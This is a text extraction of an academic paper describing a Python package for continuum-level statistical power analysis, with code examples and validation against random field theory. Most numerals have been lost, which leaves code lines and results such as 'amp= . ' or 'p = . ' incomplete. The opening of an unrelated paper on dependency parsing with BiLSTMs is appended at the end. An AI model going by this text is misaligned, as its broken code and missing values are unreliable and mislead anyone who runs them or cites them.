the literature describes two main analytical approaches to continuum-level power analysis: (i) inflated variance (friston et al., ) and (ii) noncentral rft (hayasaka et al., ; mumford & nichols, ; joyce & hayasaka, ). the inflated variance method models signal as smooth gaussian noise (fig. a) which is superimposed upon gaussian noise with different amplitude and smoothness. the non-central rft approach models signal as a constant mean shift from the null continuum (fig. b). since both techniques are analytical power calculations can be made effectively instantaneously. however, both techniques are limited by simple signal models and relatively simple noise models. in reality pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. continuum position (%) d ep en de nt v ar ia bl e (a) inflated variance noise signal continuum position (%) (b) non-central rft continuum position (%) (c) numerical figure continuum-level power analysis methods. (a) friston et al. ( ). (b) hayasaka et al. ( ) and mumford & nichols ( ). (c) this paper’s proposed computational method. rft= random field theory. the signal can be geometrically arbitrary and the noise can be arbitrarily complex (fig. c). currently no analytical methods exist for arbitrary signal geometries and arbitrary noise. the purpose of this study was to develop a computational approach to continuum-level power analysis that permits arbitrary signal and noise modeling. this paper introduces the resulting open-source python software package called power d, describes its core computational components, and cross-validates its ultimate power results with results from the two existing analytical methods (inflated variance and non-central rft). source code, html documentation and scripts replicating all results in this manuscript are available at http://www.spm d.org/power d. software implementation power d was developed in python . (van rossum, ) using anaconda . (continuum analytics, ) and is also compatible with python . . its dependencies include python’s standard numerical, scientific and plotting packages: • numpy . (van der walt, colbert & varoquaux, ). • scipy . (jones, oliphant & peterson, ). • matplotlib . (hunter, ). other versions of these dependencies are likely compatible but have not been tested thoroughly. the package is organized into the following modules: • power d.geom— d geometric primitives for data modeling. • power d.models—high-level interfaces to experiment modeling and numerical simulation. • power d.noise— d noise classes including mixtures, signal-dependent and compound classes. • power d.prob—analytical probabilities for central and noncentral t and f fields. • power d.random—smooth d gaussian field generation. • power d.roi—regions-of-interest (rois) for geometric hypothesis constraints. • power d.stats—standard t and f computations for continua. pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.spm d.org/power d http://dx.doi.org/ . /peerj-cs. details regarding the contents and capabilities of each module are provided in power d’s documentation (http://www.spm d.org/power d) and are summarized below, building to a model and ultimately a power analysis of the canadian temperature dataset above (fig. ). geometry (power d.geom) basic geometries can be constructed and visualized as follows: import power d q = y = power d.geom.gaussianpulse( q , q= , fwhm= , amp= . 
) y.plot() here q is the continuum size, q is the continuum position at which the gaussian pulse is centered, fwhm is the full-width-at-half-maximum of the gaussian kernel, and amp is its maximum value (fig. ). all of power d’s geometric primitives have a similar interface and are depicted in fig. . more complex geometries can be constructed using standard python operators as follows (see fig. ). import power d q = y = power d.geom.gaussianpulse( q , q= , fwhm= , amp= ) y = power d.geom.sinusoid( q , amp= , hz= ) ya = y + y yb = y * y yc = y ** y noise (power d.noise) continuum-level noise objects can be constructed and visualized as follows: from matplotlib import pyplot import power d j = q = n = power d.noise.gaussian( j , q , mu= , sigma= ) n = power d.noise.smoothgaussian( j , q , mu= , sigma= , fwhm= ) ax = pyplot.subplot( ) ax = pyplot.subplot( ) n .plot( ax=ax ) n .plot( ax=ax ) pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.spm d.org/power d http://dx.doi.org/ . /peerj-cs. continuum position . . . . . . . co nt in uu m v al ue figure example gaussianpulse geometry. here j is sample size and is a necessary input for all power d.noise classes. this code chunk results in the noise depicted in fig. . the smoothgaussian noise (fig. b) represents residuals observed in real datasets like those depicted implicitly in fig. a. for this smoothgaussian noise model the fwhm parameter represents the full-width-at-half- maximum of a gaussian kernel that is convolved with uncorrelated gaussian continua. rft describes probabilities associated with smooth gaussian continua (fig. b) and in particular the survival functions for test statistic continua (friston et al., ; pataky, ). all power d noise models are depicted in fig. . compound noise types are supported including additive, mixture, scaled and signal-dependent. as an example, the additive noise model depicted in fig. h can be constructed as follows: n = power d.noise.gaussian( j , q , mu= , sigma= . ) n = power d.noise.smoothgaussian( j , q , mu= , sigma= . , fwhm= ) n = power d.noise.additive ( noise , noise ) all noise models use the random method to generate new random continua, and all store the current continuum noise in the value attribute, and all number generation can be controlled using numpy’s random.seed method as follows: np.random.seed( ) j = q = noise = power d.noise.gaussian ( j , q , mu= , sigma= ) print( noise.value[ , : ] ) pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. co nt in uu m v al ue (a) continuum d (b) constant (c) exponential (d) exponentialsaw (e) gaussianpulse co nt in uu m v al ue (f) linear (g) null (h) sawpulse (i) sawtooth (j) sigmoid continuum position co nt in uu m v al ue (k) sinusoid continuum position (l) squarepulse continuum position (m) squaretooth continuum position (n) trianglepulse continuum position (o) triangletooth figure all geometric primitives. the continuum d primitive accepts an arbitrary d array as input, and all other primitives are parameterized. (a) continuum d, (b) constant, (c) exponential, (d) exponentialsaw, (e) gaussianpulse, (f) linear, (g) null, (h) sawpulse, (i) sawtooth, (j) sigmoid, (k) sinusoid, (l) squarepulse, (m) squaretooth, (n) trianglepulse, (o) triangletooth. continuum position . . . . . co nt in uu m v al ue (a) y y continuum position (b) ya = y + y yb = y * y yc = y ** y figure (a) two example geometric primitives. 
(b) python operators used to construct complex ge- ometries from primitives. noise.random() print( noise.value[ , : ] ) np.random.seed( ) noise.random( ) print( noise.value [ , : ] ) pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. continuum position co nt in uu m v al ue (a) continuum position (b) figure (a) uncorrelated gaussian noise. (b) smooth (correlated) gaussian noise. co nt in uu m v al ue (a) constantuniform (b) constantgaussian (c) uniform (d) gaussian (e) skewed co nt in uu m v al ue (f) smoothgaussian (g) smoothskewed continuum position co nt in uu m v al ue (h) additive continuum position (i) mixture continuum position (j) scaled continuum position (k) signaldependent figure all noise models. (a–e), (f–g) and (h–k) depict basic, smooth and compound noise types, respectively. the first, second and third print commands display the following results: [ . . . ] [ - . . . ] [ . . . ] this emphasizes control over power d’s random values via np.random.seed. pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. continuum position co nt in uu m v al ue (a) noise mean continuum position (b) figure data sample model. (a) and (b) depict two separate samples generated using a single datasam- ple object. data sample and experiment models (power d.models) in this section the terms ‘‘datasample’’ and ‘‘data sample’’ refer to the object class: power d.models.datasample and a numerical instantiation of that class, respectively. datasample objects have three components: (a) baseline, (b) signal and (c) noise. the first two are power d.geom objects and the last is a power d.noise object. datasample objects, like noise objects, use random to generate new random data samples as follows: j = q = baseline = power d.geom.null( q ) signal = power d.geom.gaussianpulse( q , q= , fwhm= , amp= ) noise = power d.noise.smoothgaussian( j , q , mu= , sigma= , fwhm= ) model = power d.models.datasample( baseline , signal , noise ) model.plot() model.random() model.plot() two such data samples constructed in this manner are depicted in fig. . any geometry object and any noise object can be combined to form a datasample object. the purpose of the baseline object is to provide a visual reference when constructing datasample models. for example, the atlantic temperature data from fig. a could be modeled with the experimentally observed mean as follows: data = power d.data.weather() y = data[ " continental " ] j = pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. continuum position co nt in uu m v al ue (a) noise mean continuum position (b) figure data sample model using experiment mean from the continental data in fig. . (a) and (b) depict two separate randomly generated samples. q = baseline = power d.geom.continuum d( y.mean( axis= ) ) signal = power d.geom.null( q ) n = power d.noise.gaussian( j , q , mu= , sigma= . ) n = power d.noise.smoothgaussian( j , q , mu= , sigma= , fwhm= ) noise = power d.noise.additive( n , n ) model=power d.models.datasample( baseline , signal , noise , j=j ) model.plot() model.random() model.plot() the first command loads the canadian temperature (or ‘weather’) data as a python dictionary. the second extracts just the continental data. next the experimental mean is used to create a continuum d baseline object, and a null signal object is also created. 
the next three lines create an additive noise model which contains both high- and low- frequencies. subsequently a datasample model is created with the sample size j. the results of this code chunk are depicted in fig. . the baseline component of datasample objects have no effect on subsequently described power calculations, which are based on the signal and noise components. the baseline component is included for two reasons: (a) to visually guide datasample construction, and (b) to permit hypothesis-relevant calculations. for example, one’s hypothesis may pertain to a function of the continua like their cumulative integral rather than to the originally measured continua themselves. in that case the baseline’s magnitude as well as its positive and negative regions could be important for test statistic computation. pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. once a data sample model is constructed it can be routed into an experiment model for simulation as follows: j = q = baseline = power d.geom.null( q ) signal = power d.geom.gaussianpulse( q , q= , fwhm= , amp= ) noise = power d.noise.smoothgaussian( j , q , mu= , sigma= , fwhm= ) model = power d.models.datasample( baseline , signal , noise , j=j ) teststat = power d.stats.t_ sample emodel = power d.models.experiment( model , teststat ) emodel.simulate( ) pyplot.plot( emodel.z.t , color="k" , linewidth= . ) here teststat is a function that computes the one-sample t statistic continuum. the experiment model contains both a datasample model and a test statistic computer. once the simulate method is called, a random data sample is generated and the corresponding test statistic continuum is calculated and stored in the z attribute, in this case for a total of iterations. the resulting test statistic continua are depicted in fig. . since test statistic continua can be numerically generated in this manner for arbitrary datasample and experiment models, it follows that power analysis can be numerically conducted by comparing two experiment models, one representing the null hypothesis (which contains null signal) and one representing the alternative hypothesis (which contains the signal one wishes to detect). power d provides a high-level interface to that two-experiment comparison through its experimentsimulator object as demonstrated below: j = q = baseline = power d.geom.null( q ) signal = power d.geom.null( q ) signal = power d.geom.gaussianpulse( q , q= , fwhm= , amp= ) noise = power d.noise.gaussian( j , q , mu= , sigma= ) model = power d.models.datasample( baseline , signal , noise , j=j ) model = power d.models.datasample( baseline , signal , noise , j=j ) teststat = power d.stats.t_ sample emodel = power d.models.experiment( model , teststat ) pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. continuum position te st s ta tis tic v al ue figure test statistic continua generated using an experiment model ( iterations). emodel = power d.models.experiment( model , teststat ) sim = power d.experimentsimulator( emodel , emodel ) results = sim.simulate( ) results.plot() note that the emodel and emodel objects represent null and a gaussian pulse signal, respectively, and thus represent the null and alternative hypotheses, respectively. the monte carlo simulation proceeds over , iterations (triggered by the simulate command) and completes for this example in approximately . s. 
the final results.plot command produces the results depicted in fig. . in this example the omnibus power is . (fig. a), implying that the probability of rejecting the null at at least one continuum location is . . this omnibus power should be used when the hypothesis pertains to the entire continuum because it embodies whole-continuum-level control of both false negatives and false positives. while the omnibus power is greater than . , the point-of-interest (poi) and center- of-interest (coi) powers are both well below . (fig. c ); see the fig. caption for a description of poi and coi powers. the poi power should be used if one’s hypothesis pertains to a single continuum location. the coi power should be used if the scope of the hypothesis is larger than a single point but smaller than the whole continuum. overall these results imply that, while the null hypothesis will be rejected with high power, it will not always be rejected in the continuum region which contains the modeled signal (i.e., roughly between continuum positions and ). this simple model thus highlights the following continuum-level power concepts: pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. continuum position co nt in uu m v al ue (a) null --- p(reject)= . alternative --- p(reject)= . continuum position . . . . . . po w er null power continua (b) poi power coi power (radius= ) power datum continuum position . . . . . . alternative power continua (c) figure example power d results (α = . ). (a) depicts the two experiment models and the om- nibus power (p = . ). (b, c) depict power continua (b: null model, c: alternative model). the point- of-interest (poi) continuum indicates the probability of null hypothesis rejection at each continuum point. the center-of-interest (coi) continuum depicts the same but expands the search area to a cer- tain radius surrounding the poi, in this case with an arbitrary radius of three. thus the omnibus power is equivalent to the maximum coi power when the coi radius is q (i.e., the full continuum size). the in- tegral of the poi power continuum for the null model is α. powers of , . and are displayed as dotted lines for visual reference. • continuum-level signals can be modeled with arbitrary geometry. • continuum-level omnibus power does not necessarily pertain to the modeled signal. • the investigator must specify the scope of the hypothesis in an a priori manner (i.e., single point, general region or whole-continuum) and use the appropriate power value (i.e., poi, coi or omnibus, respectively). the model depicted in fig. is simple, and similar results could be obtained analytically by constraining the continuum extent of noncentral rft inferences (hayasaka et al., ). the advantages of numerical simulation are thus primarily for situations involving arbitrary complexities including but not limited to: multiple, possibly interacting signals, signal-dependent noise, covariate-dependent noise, unequal sample sizes, non-sphericity, etc. all of these complexities introduce analytical difficulties, but all are easily handled within power d’s numerical framework. pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. regions of interest (power d.roi) the final functionality supported in power d is hypothesis constraining via region of interest (roi) continua. in practical applications, even when complete continua are recorded, one’s hypothesis does not necessarily relate to the whole continuum. 
for example, the canadian temperature example (fig. ) depicts daily values collected for the whole year, but one's hypothesis might pertain only to the summer months (approximately days – ). in this case it is probably most practical to model the entire year, but constrain the hypothesis to a certain portion of it as follows:

data = power1d.data.weather()
y = data[ "continental" ]
baseline = power1d.geom.continuum1d( y.mean( axis= ) )
signal0 = power1d.geom.null( q )
signal1 = power1d.geom.gaussianpulse( q , q= , amp= , fwhm= )
n0 = power1d.noise.gaussian( j , q , mu= , sigma= . )
n1 = power1d.noise.smoothgaussian( j , q , mu= , sigma= , fwhm= )
noise = power1d.noise.additive( n0 , n1 )
model0 = power1d.models.datasample( baseline , signal0 , noise , j=j )
model1 = power1d.models.datasample( baseline , signal1 , noise , j=j )
teststat = power1d.stats.t_1sample
emodel0 = power1d.models.experiment( model0 , teststat )
emodel1 = power1d.models.experiment( model1 , teststat )
sim = power1d.experimentsimulator( emodel0 , emodel1 )
results = sim.simulate( )
roi = np.array( [ false ] * q )
roi[ : ] = true
results.set_roi( roi )
results.set_coi_radius( )
results.plot()

the code above models a maximum temperature increase of six degrees on day as a gaussian pulse with an fwhm of days, and constrains the hypothesis to days – via the set_roi method. the results in fig. depict the roi as a blue background window and suggest that the omnibus power is close to . . setting the coi radius to the roi radius of via the set_coi_radius method emphasizes that the coi power continuum's maximum is the same as the omnibus power. also note that, had an roi not been set, the roi would implicitly be the entire continuum, in which case the omnibus power would have been considerably lower at . . this emphasizes the fact that the critical threshold must be raised as the continuum gets larger in order to control for omnibus false positives across the continuum. these analyses, involving a more complex additive noise model and , iterations, required approximately s on a standard desktop pc.

figure : example region of interest (roi)-constrained power results (α = . ). note that a coi radius of would raise the null coi power continuum to α. (a) depicts the two experiment models and the omnibus power (p = . ). (b, c) depict power continua (b: null model, c: alternative model).
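the roi mechanism itself is easy to emulate outside power1d: an roi is a boolean mask over continuum positions, and the omnibus decision is restricted to the masked region. the sketch below illustrates the threshold effect noted above using plain numpy; it is not power1d's implementation, and the mask limits, threshold construction and toy data are assumed:

import numpy as np

rng = np.random.default_rng(1)
alpha, niter, q = 0.05, 2000, 365            # assumed values
roi = np.zeros(q, dtype=bool)
roi[150:250] = True                          # assumed "summer" window

# z0 / z1: test statistic continua simulated under the null / alternative
# (toy surrogates so that the sketch is self-contained)
z0 = rng.standard_normal((niter, q))
z1 = rng.standard_normal((niter, q)) + 2.0 * np.exp(-0.5 * ((np.arange(q) - 200) / 15.0) ** 2)

# the critical threshold is the (1 - alpha) quantile of the null maximum taken
# over the search region; a smaller region yields a lower threshold
zstar_roi  = np.quantile(z0[:, roi].max(axis=1), 1 - alpha)
zstar_full = np.quantile(z0.max(axis=1), 1 - alpha)

power_roi  = np.mean(z1[:, roi].max(axis=1) > zstar_roi)
power_full = np.mean(z1.max(axis=1) > zstar_full)
# power_roi is typically the larger of the two: restricting the hypothesis
# lowers the threshold needed to control omnibus false positives

the same reasoning explains why the unconstrained analysis above yields a considerably lower omnibus power than the roi-constrained one.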
validations

0d power
power1d can be used for standard 0d (scalar) power assessments by setting an roi object to a single continuum point as follows. first set values for the main power-relevant parameters:

alpha = .
j = 
effect = .
df = j - 1
delta = effect * j ** 0.5

where alpha, df and delta are the type i error rate, degrees of freedom and noncentrality parameter, respectively. next compute power analytically:

from scipy import stats
u = stats.t.isf( alpha , df )
p = stats.nct.sf( u , df , delta )

where u is the critical threshold and where the power is p = . . to replicate this in power1d one must create a model which replicates the assumptions underlying the analytical calculation above. in the code below a continuum size of q=2 is used because that is the minimum size that power1d supports.

q = 2
baseline = power1d.geom.null( q )
signal0 = power1d.geom.null( q )
signal1 = power1d.geom.constant( q , amp=effect )
noise = power1d.noise.gaussian( j , q , mu= , sigma= )
model0 = power1d.datasample( baseline , signal0 , noise , j=j )
model1 = power1d.datasample( baseline , signal1 , noise , j=j )

last, simulate the modeled experiments and numerically estimate power:

teststat = power1d.stats.t_1sample
emodel0 = power1d.models.experiment( model0 , teststat )
emodel1 = power1d.models.experiment( model1 , teststat )
sim = power1d.experimentsimulator( emodel0 , emodel1 )
results = sim.simulate( )
roi = np.array( [ true , false ] )
results.set_roi( roi )
p = results.p_reject

here power is given by the p_reject attribute of the simulation results (i.e., the probability of rejecting the null hypothesis in the alternative experiment given the null and alternative models) and in this case the power is estimated as p = . . increasing the number of simulation iterations improves convergence to the analytical solution. repeating across a range of sample and effect sizes yields the results depicted in fig. .

figure : validation of power1d's 0d power calculations. solid lines depict theoretical solutions from the noncentral t distribution and dots depict power1d's numerically simulated results ( , iterations each).

this power1d interface for computing 0d power is admittedly verbose. nevertheless, as a positive point, power1d's interface emphasizes the assumptions that underlie power computations, and in particular the nature of the signal and noise models.

1d power: inflated variance method
the inflated variance method (friston et al., ) models signal as a gaussian continuum with a particular smoothness and particular variance. power1d does not support random signal modeling, but the inflated variance model can nevertheless be modeled using alternative noise models as demonstrated below. first all power-relevant parameters are set:

j = 
q = 
df = j - 1
alpha = .
w0 = 
w1 = .
sigma = .

here w0 and w1 are the continuum smoothness values under the null and alternative hypotheses, respectively, and sigma is the effect size as the standard deviation of the 'signal' (i.e., noise) under the alternative. next the critical rft threshold can be computed using power1d's inverse survival function following friston et al. ( ) (eqn. , p. ) as follows:

u = power1d.prob.t_isf( alpha , df , q , w0 )

next the smoothness and threshold parameters are transformed according to friston et al. ( ) (eqns. – , p. ):

s = sigma ** 2
f = float( w1 ) / w0
wstar = w0 * ( ( 1 + s ) / ( 1 + s / ( 1 + f ** 2 ) ) ) ** 0.5
ustar = u * ( 1 + s ) ** -0.5

here s is the variance and f is the ratio of signal-to-noise smoothness. the probability of rejecting the null hypothesis when the alternative is true is given as the probability that random fields with smoothness w∗ will exceed the threshold u∗ (wstar and ustar, respectively), and that probability can be computed using the standard rft survival function:

p = power1d.prob.t_sf( ustar , df , q , wstar )

here the analytical power is p = . .
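the validation that follows compares two smooth gaussian noise models. as a point of reference, smooth (spatially correlated) gaussian noise with a given fwhm can be generated outside power1d by smoothing white noise and restoring unit variance; the following is a minimal sketch, not power1d's implementation, and the helper name and example values are assumptions:

import numpy as np
from scipy.ndimage import gaussian_filter1d

def smooth_gaussian_noise(J, Q, fwhm, rng):
    # J realizations of (approximately) unit-variance gaussian noise with smoothness fwhm
    sd = fwhm / (2.0 * np.sqrt(2.0 * np.log(2.0)))      # kernel sd from fwhm
    z = gaussian_filter1d(rng.standard_normal((J, Q)), sd, axis=1, mode="wrap")
    # smoothing shrinks the variance by the sum of squared kernel weights,
    # which can be read off the filter's impulse response
    impulse = np.zeros(Q)
    impulse[Q // 2] = 1.0
    w = gaussian_filter1d(impulse, sd, mode="wrap")
    return z / np.sqrt((w ** 2).sum())

noise = smooth_gaussian_noise(J=8, Q=101, fwhm=20.0, rng=np.random.default_rng(0))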
validating this analytical power calculation in power1d can be achieved using a null signal and two different noise models as follows:

baseline = power1d.geom.null( q=q )
signal = power1d.geom.null( q=q )
sg = power1d.noise.smoothgaussian
n0 = sg( q=q , sigma= . , fwhm=w0 , j=j )
n1 = sg( q=q , sigma= . , fwhm=wstar , j=j )
model0 = power1d.models.datasample( baseline , signal , n0 , j=j )
model1 = power1d.models.datasample( baseline , signal , n1 , j=j )
teststat = power1d.stats.t_1sample
emodel0 = power1d.experiment( model0 , teststat )
emodel1 = power1d.experiment( model1 , teststat )
sim = power1d.experimentsimulator( emodel0 , emodel1 )
results = sim.simulate( )
p = results.sf( ustar )

the numerically estimated power is p = . , which is reasonably close to the analytical probability of . after just , iterations. repeating for background noise smoothness values of , and , sample sizes of , and , and effect sizes ranging from σ = . to . yields the results depicted in fig. . close agreement between the theoretical and simulated power results is apparent. as noted by hayasaka et al. ( ), powers are quite low for the inflated variance approach because the signal is not strong; the 'signal' is effectively just a different type of noise. the noncentral rft approach described in the next section addresses this limitation.

figure : validation results for the inflated variance approach to 1d power. solid lines depict theoretical solutions from noncentral random field theory and dots depict power1d's numerically simulated results ( , iterations each). j represents sample size and fwhm represents the smoothness of the background noise process. (a) fwhm= , (b) fwhm= , (c) fwhm= .

1d power: noncentral rft method
the noncentral rft method models signal as a constant continuum shift (hayasaka et al., ). like the inflated variance method above, it can be computed analytically in power1d by first defining all power-relevant parameters:

j = 
q = 
w = .
df = j - 1
alpha = .
effect = .
delta = effect * j ** 0.5

where delta is the noncentrality parameter. next power can be computed via noncentral rft (hayasaka et al., ; mumford & nichols, ; joyce & hayasaka, ) as follows:

u = power1d.prob.t_isf( alpha , df , q , w )
p = power1d.prob.nct_sf( u , df , q , w , delta )

here u is the critical threshold and nct_sf is rft's noncentral t survival function. the analytical power is p = . . next, similar to the 0d validation above, power1d can be used to validate this analytical power by constructing signal and noise objects as indicated below. note that the signal is constant (fig. ), as assumed by the noncentral rft method.

baseline = power1d.geom.null( q )
signal0 = power1d.geom.null( q )
signal1 = power1d.geom.constant( q , amp=effect )
n = power1d.noise.smoothgaussian( j , q , mu= , sigma= , fwhm=w )
model0 = power1d.datasample( baseline , signal0 , n , j=j )
model1 = power1d.datasample( baseline , signal1 , n , j=j )

last, simulate the modeled experiments and numerically estimate power:

teststat = power1d.stats.t_1sample
emodel0 = power1d.models.experiment( model0 , teststat )
emodel1 = power1d.models.experiment( model1 , teststat )
sim = power1d.experimentsimulator( emodel0 , emodel1 )
results = sim.simulate( )
p = results.p_reject

here the numerically estimated power is p = . , which is again similar to the analytical probability of p = . after just , iterations. repeating for smoothness values of , and , sample sizes of , and , and effect sizes ranging from . to . yields the results depicted in fig. . agreement between the theoretical and numerically simulated powers is reasonable except for large effect sizes and intermediate sample sizes (fig. c, j = ). since theoretical and simulated results appear to diverge predominantly for high powers, these results suggest that the noncentral rft approach is valid in scenarios where powers of approximately . are sought for relatively small sample sizes.

figure : validation results for the noncentral random field theory approach to 1d power. solid lines depict theoretical solutions from noncentral random field theory and dots depict power1d's numerically simulated results ( , iterations each). fwhm and j represent continuum smoothness and sample size, respectively. (a) fwhm= , (b) fwhm= , (c) fwhm= .

while the noncentral rft approach has addressed the low-power limitation of the inflated variance method (fig. ), its 'signal' is geometrically simple in the form of a mean shift. clearly other, more complex signal geometries may be desirable. for example, in the context of the canadian temperature data (fig. ), one may have a forward dynamic model which predicts regional temperatures through region-specific parameters such as land formations, foliage, wind patterns, proximity to large bodies of water and atmospheric carbon dioxide. forward models like those can be used to generate specific continuum predictions based on, for example, increases in atmospheric carbon dioxide. those continuum predictions are almost certainly not simple signals like the ones represented by the inflated variance and noncentral rft methods. therefore, when planning an experiment to test continuum-level predictions, and specifically when determining how many continuum measurements are needed to achieve a threshold power, the numerical simulation capabilities of power1d may be valuable.

comparison with other software packages
power calculations for 0d (scalar) data are available in most commercial and open-source statistical software packages. many of those offer limited functionality in that most are limited to the noncentral t distribution, and many have vague user interfaces in terms of experimental design. some also offer an interface to noncentral f computations, but nearly all have limited capabilities in terms of design. the most comprehensive and user-friendly software package for computing power is g*power (faul et al., ). in addition to the standard offerings of noncentral t computations, g*power also offers noncentral distributions for f, χ2 and a variety of other test statistics. it has an intuitive graphical user interface that is dedicated to power-specific questions. however, in the context of this paper g*power is identical to common software packages in that its power calculations are limited to 0d (scalar) data. two software packages dedicated to continuum-level power assessments, and those most closely related to power1d, are:
powermap (joyce & hayasaka, ). . fmripower (mumford & nichols, ). both powermap and fmripower are designed specifically for continuum-level power analysis, and both extend the standard noncentral t and f distributions to the continuum domain via rft. they have been used widely in the field of neuroimaging for planning brain imaging experiments and they both offer graphical interfaces with a convenient means of incorporating piiot data into guided power analyses. however, both are limited in terms of the modeled signals they offer. rft’s noncentral t and f distributions model ‘signal’ as a whole-continuum mean displacement, which is geometrically simple relative to the types of geometries that are possible at the continuum level (see the ‘software implementation: geometry section above). powermap and fmripower somewhat overcome the signal simplicity problem through continuum region constraints, where signal is modeled in some regions and not in others in a binary sense. this approach is computationally efficient but is still geometrically relatively simple. a second limitation of both packages is that they do not support numerical simulation of random continua. this is understandable because it is computationally infeasible to routinely simulate millions or even thousands of the large-volume d and d random continua that are the target of those packages’ power assessments. consequently neither powermap nor fmripower supports arbitrary continuum signal modeling. as outlined in the examples above power d replicates the core functionality of powermap and fmripower for d continua. it also offers functionality that does not yet exist in any other package: arbitrary continuum-level signal and noise modeling and associated computational power analysis though numerical simulation of random continua. this functionality greatly increases the flexibility with which one can model one’s data, and allows investigators to think about the signal and noise in real-world units, without directly thinking about effect sizes and effect continua. summary this paper has described a python package called power d for estimating power in experiments involving d continuum data. its two main features include (a) analytical continuum-level power calculations based on random field theory (rft) and (b) computational power analysis via continuum-level signal and noise modeling. numerical simulation is useful for d power analysis because d continuum signals can adopt arbitrary and non-parameterizable geometries. this study’s cross-validation results show pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. that power d’s numerical estimates closely follow theoretical solutions, and also that its computational demands are not excessive, with even relatively complex model simulations completing in under s. since power d accommodates arbitrary signals, arbitrary noise models and arbitrarily complex experimental designs it may be a viable choice for routine yet flexible power assessments prior to d continuum experimentation. additional information and declarations funding this work was supported by wakate a grant h from the japan society for the promotion of science. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: japan society for the promotion of science: h . 
competing interests the author declares there are no competing interests. author contributions • todd c. pataky conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper, wrote the software and its documentation. data availability the following information was supplied regarding data availability: all code, including scripts to replicate the paper’s results, are available at http: //www.spm d.org/power d. references adler r, hasofer a. . level crossings for random fields. the annals of probability ( ): – doi . /aop/ . continuum analytics. . anaconda: leading open data science platform powered by python. https://www.continuum.io/anaconda-overview. faul f, erdfelder e, lang a-g, buchner a. . g*power : a flexible statistical power analysis program for the social, behavioral, and biomedical sciences. behavior research methods ( ): – doi . /bf . friston k, worsley k, frackowiak r, mazziotta j, evans a. . assessing the significance of focal activations using their spatial extent. human brain mapping ( ): – doi . /hbm. . pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.spm d.org/power d http://www.spm d.org/power d http://dx.doi.org/ . /aop/ https://www.continuum.io/anaconda-overview http://dx.doi.org/ . /bf http://dx.doi.org/ . /hbm. http://dx.doi.org/ . /peerj-cs. friston kj, ashburner jt, kiebel sj, nichols te, penny wd. . statistical paramet- ric mapping: the analysis of functional brain images. london: elsevier. friston kj, holmes a, poline jb, price cj, frith cd. . detecting activations in pet and fmri: levels of inference and power. neuroimage ( ): – doi . /nimg. . . hasofer am. . upcrossings of random fields. advances in applied probability : – doi . /s . hayasaka s, peiffer am, hugenschmidt ce, laurienti pj. . power and sample size calculation for neuroimaging studies by non-central random field theory. neuroimage ( ): – doi . /j.neuroimage. . . . hunter jd. . matplotlib: a d graphics environment. computing in science and engineering ( ): – . jones e, oliphant t, peterson p. . scipy: open source scientific tools for python. available at http://www.scipy.org/ . joyce ke, hayasaka s. . development of powermap: a software package for statis- tical power calculation in neuroimaging studies. neuroinformatics ( ): – doi . /s - - - . kiebel s, poline j, friston k, holmes a, worsley k. . robust smoothness estima- tion in statistical parametric maps using standardized residuals from the general linear model. neuroimage ( ): – doi . /nimg. . . mumford j, nichols te. . power calculation for group fmri studies accounting for arbitrary design and temporal autocorrelation. neuroimage ( ): – doi . /j.neuroimage. . . . nichols t, holmes a. . nonparametric permutation tests for functional neuroimaging: a primer with examples. human brain mapping ( ): – doi . /hbm. . pataky tc. . rft d: smooth one-dimensional random field upcrossing probabilities in python. journal of statistical software ( ): – . ramsay jo, silverman bw. . functional data analysis. new york: springer-verlag. van der walt s, colbert sc, varoquaux g. . the numpy array: a structure for efficient numerical computation. computing in science and engineering : – . van rossum g. . the python library reference release . . . available at https: //docs.python.org/ /library/ . pataky ( ), peerj comput. sci., doi . /peerj-cs. 
simple and accurate dependency parsing using bidirectional lstm feature representations

eliyahu kiperwasser
computer science department, bar-ilan university, ramat-gan, israel
elikip@gmail.com

yoav goldberg
computer science department, bar-ilan university, ramat-gan, israel
yoav.goldberg@gmail.com

abstract
we present a simple and effective scheme for dependency parsing which is based on bidirectional-lstms (bilstms). each sentence token is associated with a bilstm vector representing the token in its sentential context, and feature vectors are constructed by concatenating a few bilstm vectors. the bilstm is trained jointly with the parser objective, resulting in very effective feature extractors for parsing. we demonstrate the effectiveness of the approach by applying it to a greedy transition-based parser as well as to a globally optimized graph-based parser. the resulting parsers have very simple architectures, and match or surpass the state-of-the-art accuracies on english and chinese.

introduction
the focus of this paper is on feature representation for dependency parsing, using recent techniques from the neural-networks ("deep learning") literature. modern approaches to dependency parsing can be broadly categorized into graph-based and transition-based parsers (kübler et al., ). graph-based parsers (mcdonald, ) treat parsing as a search-based structured prediction problem in which the goal is learning a scoring function over dependency trees such that the correct tree is scored above all other trees. transition-based parsers (nivre, ; nivre, ) treat parsing as a sequence of actions that produce a parse tree, and a classifier is trained to score the possible actions at each stage of the process and guide the parsing process. perhaps the simplest graph-based parsers are arc-factored (first order) models (mcdonald, ), in which the scoring function for a tree decomposes over the individual arcs of the tree. more elaborate models look at larger (overlapping) parts, requiring more sophisticated inference and training algorithms (martins et al., ; koo and collins, ). the basic transition-based parsers work in a greedy manner, performing a series of locally-optimal decisions, and boast very fast parsing speeds. more advanced transition-based parsers introduce some search into the process using a beam (zhang and clark, ) or dynamic programming (huang and sagae, ).

